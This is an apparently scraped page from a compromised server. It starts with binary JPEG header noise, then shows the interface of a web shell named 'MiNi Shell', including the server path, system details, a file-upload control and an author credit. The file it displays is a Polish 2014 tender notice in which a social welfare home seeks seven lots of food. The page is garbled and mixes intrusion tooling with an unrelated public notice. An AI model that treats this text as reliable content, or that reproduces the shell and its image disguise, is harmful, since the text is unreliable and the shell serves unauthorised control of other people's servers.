JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141203/396862-N-2014.html

<p class="kh_header"><b>Bystrzyca Kłodzka: Dostawa artykułów spożywczych w 2015 roku CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne</b><br>
<b>Numer ogłoszenia: 396862 - 2014; data zamieszczenia: 03.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Górna 23, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 0-74 8110555, faks 0-74 8110550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.bystrzyca.bip-info.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w 2015 roku CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych w 2015 roku CPV 15000000-8 Żywność, napoje, tytoń i produkty pokrewne pogrupowanych na części:Część I - Drób CPV 15111200-6; Wieprzowina CPV 15113000-3 Część II - Produkty mięsno-wędliniarskie CPV 15131100-6 Część III - Produkty mleczarskie CPV 15500000-3; Margaryna i podobne produkty CPV 15431000-8 Część IV - Różne produkty spożywcze CPV 15800000-6; Jaja CPV 03142500-3; Oleje i tłuszcze zwierzęce lub roślinne CPV 15400000-2; Produkty przemiału ziarna, skrobi i produktów skrobiowych CPV 15600000-4 Część V - Pieczywo, świeże wyroby piekarskie i ciastkarskie CPV 15810000-9 Część VI - Owoce, warzywa i podobne produkty CPV 15300000-1 Część VII - Ryby przetworzone i konserwowane CPV 15200000-0..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.50.00.00-3, 15.81.00.00-9, 15.80.00.00-6, 03.14.25.00-3, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wiedzy i doświadczenia wykonawca przedłoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz powinien zawierać co najmniej 1 dostawę odpowiadającą ilością i asortymentem szczegółowemu spisowi przedmiotu zamówienia części przedmiotu zamówienia.Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia warunku dokonana będzie według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę cen zawartych w ofercie wyłącznie w oparciu o wskaźnik cen towarów i usług konsumpcyjnych ogółem za kwartał 2015 roku ogłaszany komunikatem Prezesa GUS w Monitorze Polskim, jeżeli wskaźnik ten wzrośnie lub zmaleje o minimum 3%. Cena danych towarów może być w takim przypadku zmniejszona lub zwiększona o tyle procent o ile wzrośnie lub ulegnie zmniejszeniu wskaźnik cen towarów i usług konsumpcyjnych ogółem za kwartał danego roku. Zmiana cen wymaga uprzedniego pisemnego zawiadomienia zamawiającego przez wykonawcę wraz ze wskazaniem podstawy zmiany.Zmiana stawki podatku VAT obowiązywać będzie z mocy prawa i nie wymaga aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.bystrzyca.bip-info.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Ul. Górna 23; 57-500 Bystrzyca Kłodzka, sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2014 godzina 09:45, miejsce: Dom Pomocy Społecznej Ul. Górna 23; 57-500 Bystrzyca Kłodzka, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CPV 15111200-6 Drób, CPV 15113000-3 Wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczaki
750 kg
Nogi z kurcząt
420 kg
Filet z kurczaka
110 kg
Wątroba drobiowa
60 kg
Łopatka b/k
700 kg
Mięso wieprzowe od szynki
210 kg
Karczek b/k
75 kg
Schab b/k
150 kg
Żeberka wieprzowe
80 kg
Filet z indyka
180 kg
Mięso gulaszowe z indyka
250 kg
Kości wieprzowe
160 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CPV 15131100-6 Produkty mięsno-wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierś wędzona z indyka
12 kg
Szynka indycza
56 kg
Pieczeń dietetyczna
22 kg
Salceson z indyka
45 kg
Krakowska z indyka
34 kg
Szynka wieprzowa wiejska
130 kg
Smaczek w galarecie
50 kg
Baleron
50 kg
Polędwica sopocka
85 kg
Polędwica drobiowa
40 kg
Szynka konserwowa wieprzowa
75 kg
Schab biały - wędlina 
18 kg
Kurczak po staropolsku
30 kg
Pasztet kremowy drobiowy
30 kg
Pasztet wieprzowy
60 kg
Pasztet zapiekany
110 kg
Pasztet drobiowy 50g, bez konserwantów, bez glutaminianu, bez wieprzowiny
2670 szt
Kaszanka
62 kg
Salceson włoski
65 kg
Mortadela
105 kg
Kiełbasa szynkowa wieprzowa
70 kg
Kiełbasa szynkowa drobiowa
70 kg
Kiełbasa żywiecka
32 kg
Kiełbasa śląska
90 kg
Kiełbasa domowej roboty/wiejska
50 kg
Kiełbasa podwawelska
110 kg
Kiełbasa zielonogórska / luksusowa
40 kg
Kiełbasa biała parzona
90 kg
Ogonówka
50 kg
Serdelki wieprzowe
100 kg
Parówki drobiowe
160 kg
Boczek wędzony
45 kg
Konserwa mięsna 330g
(zawartość mięsa wieprzowego min. 90%)
95 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CPV 15500000-3 Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 2%
11340l
Mleko w proszku
 (zawartość tłuszczu min.26%)
76 kg
Śmietana 12%
421 l
Masło roślinne w kostce 250g
553kg
Masło śmietankowe ekstra w kostce 200g
365 kg
Margaryna do pieczenia ciast  w kostce 250 g (typu Palma z murzynkiem)
20 kg
Margaryna do smażenia w kostce 250g
200 kg
Twaróg
520 kg
Serek/twaróg śmietankowy
24 kg
Ser topiony
 różne smaki
105 kg
Ser topiony krążki
300 op
Ser topiony blok 100g
1200 szt
Ser żółty podpuszczkowy, pełnotłusty ( (zawartość tłuszczu min.40%)

280 kg
Serek twarogowo-śmietankowy w porcji 
(typu kiri, naturek)
250 op
Serek twarogowo-śmietankowy w porcji wielosmakowy 20g 
(typu tartare )
1500szt
Serek smakowy 150g
1500 szt
Serek wiejski 150 g
1500 szt
Serek homogenizowany waniliowy 150 g
400 szt
Kefir 150g
240 szt
Jogurt owocowy 130g
3000szt
Jogurt naturalny 150 g
1500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CPV 03142500-3 Jaja, CPV 15800000-6 Różne produkty spożywcze
CPV 15400000-2 Oleje i tłuszcze zwierzęce lub roślinne; 
CPV 15600000-4  Produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja (L 63g-73g)
21000 szt
Olej 1l
380 szt
Olej 0,5 l
45 szt
Ryż
220 kg
Mąka pszenna typ 500
600 kg
Płatki owsiane 0,5 kg
180 szt
Kasza manna
90 kg
Kasza kukurydziana
60 kg
Kasza gryczana
41 kg
Kasza jęczmienna
80 kg
Mąka ziemniaczana
55 kg
Cukier kryształ
1500 kg
Cukier puder
10 kg
Sól
225 kg
Herbata czarna granulowana 100g 
1100 szt
Kawa zbożowa 1 kg
200 szt
Makaron różny
405 kg
Ocet 1l
70 szt
Musztarda stołowa 
180 g
500 szt
Cynamon 20 g
52 szt
Przyprawa do piernika 20 g
6 szt
Gałka muszkatołowa 25g
12 szt
Przyprawa gyros 20g
10 szt
Kminek 40g 
60 op
Soda oczyszczona 70 g
10 szt
Proszek do pieczenia 40g
30  szt
Cukier waniliowy 30g
350 szt
Ketchup łagodny 1kg
90 kg
Kalafior mrożony
63 kg
Brokuł mrożony
22 kg
Dżem 330g
2020 szt
Syrop owocowy 330ml
175 szt
Miód naturalny 25 g
3900 szt
Kwasek cytrynowy 20g
45 szt
Kakao naturalne 200g
105 szt
Czekolada mleczna100g
100 szt
Wafelki czekoladowe 28g
1330 szt
Rodzynki w czekoladzie mlecznej 150g
100 op
Cukierki czekoladowe
5 kg
Ciastka - biszkopty z galaretką w czekoladzie 130g (typu delicje) 
100 op
Batonik czekoladowy nadziewany 50 g 
(typu Pawełek)
200 szt 
Chrzan w słoikach 
55 szt
Kukurydza - puszka
115 szt
Imbir 20g
12szt
Groszek konserwowy
70 szt
Koncentrat pomidorowy 30% 200g
120szt
Sok pomidorowy 1l
190 szt
Biszkopty 150 g
5 op
Biszkopt z nadzieniem 40g
320 szt
Suchary 285g
15 op
Wiórka kokosowe 100g
5 op
Galaretka owocowa w proszku 
17szt
Śmietana w proszku typu śnieżka 
10 szt
Jabłka prażone 900g
10 szt
Goździki 
7 op
Przyprawa curry 
5 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3, 15.60.00.00-4, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CPV 15810000-9  Pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenny krojony 0,6kg
8806szt.
Bułka paryska krojona 
0,4 kg
7857 szt.
Chleb graham krojony 
0,5 kg
2184 szt.
Bułki drożdżowe 120g
1514 szt.
Pączki 
230szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CPV 15300000-1 Owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki
8750 kg
Ziemniaki młode (czerwiec, lipiec, sierpień)

3000 kg
Kapusta biała
250 kg
Kapusta młoda
220 szt
Kapusta pekińska
285 kg
Kapusta kiszona
345 kg
Kapusta czerwona
375 kg
Kapusta włoska
125 szt
Seler korzeń
210 kg
Seler młody z nacią
50 szt
Pietruszka korzeń
220 kg
Marchew
1400 kg
Sałata
240 szt
Burak czerwony
620 kg
Botwina pęczek
12 szt
Por kg
50 kg
Por szt.
155 szt
Papryka czerwona
40 kg
Pieczarki
6 kg
Cukinia
7 kg
Ogórek zielony szklarniowy
60 kg
Ogórek zielony gruntowy
60 kg
Kalafior (min.500g)
190 szt
Brokuł (min.500g)
20szt
Fasolka szparagowa
5 kg
Czosnek kg
15 kg
Rzodkiewka-pęczek
575 szt
Szczypior-pęczek
155 szt
Koper zielony-pęczek
365 szt
Pietruszka natka-pęczek
135 szt
Cebula
500 kg
Pomidor
1000 kg
Sałatki warzywne konserwowe 900g
100 szt
Sałatka szwedzka 900g
120 szt
Ogórki kiszone 
66 kg
Ogórki małosolne 
20 kg
Szczaw konserwowy 330g
40 szt
Papryka konserwowa  900g
100 szt
Ogórki konserwowe 900g
360 szt
Fasola sucha
48 kg
Groch suchy
17 kg
Jabłka
1150 kg
Cytryny
40 kg
Banany
235 kg
Mandarynka
20 kg
Nektaryna 
5 kg
Brzoskwinia koszyk
10 op
Brzoskwinia puszka
10 szt
Kiwi kg
18 kg
Kiwi koszyk 
10 szt
Susz owocowy - mieszanka 250g
15 op
Grzyby suszone - podgrzybek
0,5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CPV 15200000-0 Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z dorsza mrożony-shatter pack
225 kg
Makrela wędzona
60 kg
Konserwa rybna w pomidorach  330g
650 szt
Śledzie matias
80 kg
Sałatka śledziowa
45 kg
Masełko rybne
42 kg
Tuńczyk w kawałkach w sosie własnym konserwa 170g
300 szt
Karp żywy
8kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com